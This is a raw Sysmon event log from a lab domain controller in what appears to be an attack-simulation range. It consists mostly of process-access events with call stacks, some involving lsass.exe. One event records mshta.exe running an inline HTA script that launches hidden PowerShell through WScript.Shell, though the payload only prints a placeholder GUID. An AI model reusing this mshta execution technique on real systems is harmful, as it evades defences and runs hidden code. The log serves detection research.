15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027713Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027712Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027989Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.600{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027988Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.584{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027987Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.553{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027986Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.553{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000027985Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.506{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_pchdzm5p.pii.ps12021-01-20 15:59:46.506 10341000x800000000000000027984Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.491{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027983Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.459{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5372-6008-7F06-00000000A301}5808C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027982Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.459{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5372-6008-7F06-00000000A301}5808C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027981Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.459{7901BC46-5372-6008-7F06-00000000A301}58085912C:\Windows\system32\conhost.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027980Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.444{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5372-6008-7F06-00000000A301}5808C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027979Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.444{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027978Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.444{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027977Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.444{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027976Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.444{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027975Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.444{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027974Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.444{7901BC46-5372-6008-7D06-00000000A301}18041880C:\Windows\System32\mshta.exe{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000027973Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.449{7901BC46-5372-6008-7E06-00000000A301}3400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script language="JScript.Compact">a=new%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%20-nop%20-Command%20Write-Host%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%20Start-Sleep%20-Seconds%202;%20exit",0,true);close();</script>'" 10341000x800000000000000027972Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.412{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027971Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.412{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027970Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.412{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027969Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.412{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027968Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.412{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027967Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.412{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027966Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.397{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027965Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.397{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027964Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.397{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027963Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 